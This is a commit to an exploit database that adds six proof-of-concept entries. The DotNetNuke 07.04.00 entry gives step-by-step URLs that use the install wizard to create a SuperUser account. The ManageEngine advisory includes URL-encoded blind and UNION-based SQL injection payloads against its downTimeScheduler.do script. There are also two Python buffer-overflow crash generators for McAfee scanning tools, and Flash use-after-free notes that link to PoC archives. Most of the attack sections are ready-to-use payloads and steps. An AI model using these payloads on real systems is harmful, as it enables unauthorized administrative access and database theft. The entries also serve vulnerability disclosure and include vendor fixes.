DB: 2016-05-07

6 new exploits RPCScan 2.03 - Hostname/IP Field Crash PoC CIScan 1.00 - Hostname/IP Field Crash PoC DotNetNuke 07.04.00 - Administration Authentication Bypass Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities
2016-05-07 05:03:58 +00:00 · 2016-05-07 05:03:58 +00:00 · 6fa97a6001
commit 6fa97a6001
parent c7e317d2e0
7 changed files with 246 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35984,3 +35984,9 @@ id,file,description,date,author,platform,type,port
 39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free via double-fdput() in bpf(BPF_PROG_LOAD) Error Path Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
 39773,platforms/linux/dos/39773.txt,"Linux (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos,0
 39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0
+39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0
+39776,platforms/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0
+39777,platforms/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",asp,webapps,80
+39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-05-06,"Google Security Research",windows,dos,0
+39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0
+39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443
--- a/platforms/asp/webapps/39777.txt
+++ b/platforms/asp/webapps/39777.txt
@ -0,0 +1,61 @@
+# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
+# Date: 06-05-2016
+# Exploit Author: Marios Nicolaides
+# Vendor Homepage: http://www.dnnsoftware.com/
+# Software Link: https://dotnetnuke.codeplex.com/releases/view/611324
+# Version: 07.04.00
+# Tested on: Microsoft Windows 7 Professional (64-bit)
+# Contact: marios.nicolaides@outlook.com
+# CVE: CVE-2015-2794
+# Category: webapps
+ 
+1. Description
+   
+DotNetNuke 07.04.00 does not prevent anonymous users from accessing the installation wizard, as a result a remote attacker 
+can 'reinstall' DNN and get unauthorised access as a SuperUser.
+
+Previous versions of DotNetNuke may also be affected.
+ 
+   
+2. Proof of Concept
+ 
+The exploit can be demonstrated as follows:
+
+If the DNN SQL database is in the default location and configuration:
+	- Database Type: SQL Server Express File
+	- Server Name: .\SQLExpress
+	- Filename: Database.mdf (This is the default database file of DNN. You can find it at \App_Data\Database.mdf)
+
+The following URL will create an account with the username: 'host', password: 'dnnhost':
+	http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall
+
+
+If the DNN SQL database is not in the default configuration then the attacker must know its configuration or be able to brute-force guess it.
+
+	A. Visit http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
+	B. Fill in the form and submit it:
+		Username: whatever
+		Password: whateverpassword
+		Email address: whatever@example.com (You will get an error msg due to client-side validation, just ignore it)
+		Website Name: Whatever Site Name
+		Database Setup Custom:
+			- Database Type: SQL Server Express File
+			- Server Name: .\SQLExpress 
+				- This is the SQL Server instance name that we need to find or brute-force guess it in order to complete the installation. 
+				- If MSSQL database is accessible you can use auxiliary/scanner/mssql/mssql_ping from MSF to get it.
+			- Filename: Database.mdf
+				- This is the default database file of DNN. You can find it at "\App_Data\Database.mdf".
+			- Tick the box Run Database as a Database Owner
+	C. You will probably get an error. Remove the "__VIEWSTATE=" parameter from the URL and press enter.
+	D. When the installation completes click Visit Website.
+	E. Login with your credentials.
+
+3. Solution:
+
+Update to version 07.04.01
+https://dotnetnuke.codeplex.com/releases/view/615317
+
+4. References:
+
+http://www.dnnsoftware.com/platform/manage/security-center (See 2015-05 (Critical) unauthorized users may create new host accounts)
+http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
--- a/platforms/jsp/webapps/39780.txt
+++ b/platforms/jsp/webapps/39780.txt
@ -0,0 +1,105 @@
+[SPSA-2016-02/ManageEngine ApplicationsManager]------------------------------
+
+SECURITY ADVISORY:   SPSA-2016-02/ManageEngine Applications Manager Build No: 12700
+
+Affected Software:   ManageEngine Applications Manager Build No: 12700
+Vulnerability:       Information Disclosure and Un-Authenticated SQL
+injection.
+CVSSv3:              9.3
+Severity:            Critical
+Release Date:        2016-05-05
+
+I. Background
+~~~~~~~~~~~~~	   	
+
+ManageEngine Applications Manager is an Application Performance Monitoring across physical, virtual and cloud environments.
+
+
+II. Description
+~~~~~~~~~~~~~~~
+
+For details about the fix please visit https://www.manageengine.com/products/applications_manager/release-notes.html
+
+Information Disclosure:
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and Monitored Server Details like name IP and maintenance schedule.
+
+POC
+~~~
+
+License Information:
+https://ManageEngineHost/jsp/About.jsp?context=/CAMGlobalReports.do?method=disableReports 
+
+List of Maintenance tasks:
+https://ManageEngineHost/downTimeScheduler.do?method=maintenanceTaskListView&tabtoLoad=downtimeSchedulersDiv
+
+Details of Maintenance tasks with details about monitored server:
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=2&edit=true&readonly=false
+
+SQL Injection:
+~~~~~~~~~~~~~~
+
+The downTimeScheduler.do script is vulnerable to a Boolean based blind, and Union based SQL injection, that allows complete unauthorized access to the back-end database, according to the level of privileges of the application database user.
+
+Vulnerable URL:
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
+Vulnerable Parameter: GET parameter taskid
+
+PoC:
+~~~~
+
+Boolean Based Blind SQL Injection PoC: 
+
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
+and 1=1  (True)
+
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
+and 1=2  (False)
+
+The following will include the Database Name in the Schedule Details
+Description text box:
+
+Union-Based SQL Injection PoC: Number of Columns 15, ORDER BY was
+usable.
+
+MSSQL: During our testing, the payload needed to be URL Encoded.
+
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28%28SELECT%20DB_NAME%28%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28112%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
+
+MYSQL: During our testing, the payload did not need URL Encoding.
+
+https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15%20--
+
+
+III. Impact
+~~~~~~~~~~~
+
+Information Disclosure Impact:
+
+An attacker might make use of the intelligence gathered through information leakages such as these for further attacks against the application, and its underlying infrastructure
+
+Un-Authenticated SQL Injection Impact:
+
+Access to sensitive information, stored in the application Database server, depending on the privileges of the application's database user. 
+
+
+IV. Remediation
+~~~~~~~~~~~~~~~
+
+Apply Vendor supplied patch build #12710, details are available at
+https://www.manageengine.com/products/applications_manager/release-notes.html
+
+V. Disclosure
+~~~~~~~~~~~~~
+
+Reported By: Saif El-Sherei, @saif_sherei, saif@sensepost.com
+
+Discovery Date:         2016-02-29
+Vendor Informed:        2016-03-04
+Advisory Release Date:  2016-05-05
+Patch Release Date:     2016-04-28
+Advisory Updated:    	2016-05-05
+
+
+---------------------------------[SPSA-2016-02/ManageEngine ApplicationsManager]---
--- a/platforms/windows/dos/39775.py
+++ b/platforms/windows/dos/39775.py
@ -0,0 +1,29 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Exploit Title     	: RPCScan v2.03 Hostname/IP Field Local BoF PoC
+# Discovery by      	: Irving Aguilar
+# Email			: im.aguilar@protonmail.ch
+# Discovery Date    	: 05.05.2016
+# Software Link     	: http://www.mcafee.com/us/downloads/free-tools/rpcscan.aspx#
+# Tested Version    	: 2.03
+# Vulnerability Type	: Denial of Service (DoS) Local
+# Tested on OS		: Windows 7 Enterprise SP1 x64 en
+#
+#
+# Steps to Produce the Crash: 
+# 1.- Run python code : python RPCScan-BoF.py
+# 2.- Open RPCScan-BoF.txt and copy content to clipboard
+# 3.- Open RPCScan2.exe
+# 4.- Clic button Ok
+# 5.- Paste Clipboard Scan > Hostname/IP
+# 6.- Clic on add button (->)
+# 7.- Clic button Aceptar
+# 8.- Crashed
+ 
+buffer = "\x41" * 388
+eip = "\x42" * 4
+ 
+f = open ("RPCScan-BoF.txt", "w")
+f.write(buffer + eip)
+f.close()
--- a/platforms/windows/dos/39776.py
+++ b/platforms/windows/dos/39776.py
@ -0,0 +1,29 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+# Exploit Title	: CIScanv1.00 Hostname/IP Field Local BoF PoC
+# Discovery by  	: Irving Aguilar
+# Email		: im.aguilar@protonmail.ch
+# Discovery Date	: 05.05.2016
+# Software Link 	: http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
+# Tested Version	: 1.00
+# Vulnerability Type	: Denial of Service (DoS) Local
+# Tested on OS		: Windows 7 Enterprise SP1 x64 en
+#
+#
+# Steps to Produce the Crash:
+# 1.- Run python code : python CIScanv1-BoF.py
+# 2.- Open CIScanv1-BoF.txt and copy content to clipboard
+# 3.- Open CIScan.exe
+# 4.- Clic button Ok
+# 5.- Paste Clipboard Scan > Hostname/IP
+# 6.- Clic on add button (->)
+# 7.- Clic button Aceptar
+# 8.- Crashed
+
+buffer = "\x41" * 388
+eip = "\x42" * 4
+
+f = open ("CIScanv1-BoF.txt", "w")
+f.write(buffer + eip)
+f.close()
--- a/platforms/windows/dos/39778.txt
+++ b/platforms/windows/dos/39778.txt
@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=719
+
+There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39778.zip
+
--- a/platforms/windows/dos/39779.txt
+++ b/platforms/windows/dos/39779.txt
@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=759
+
+There is a use-after-free in MovieClip.duplicateMovieClip.If an action associated with the MovieClip frees the clip provided as the initObject parameter to the call, it will be used after it is freed.A PoC is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39779.zip
+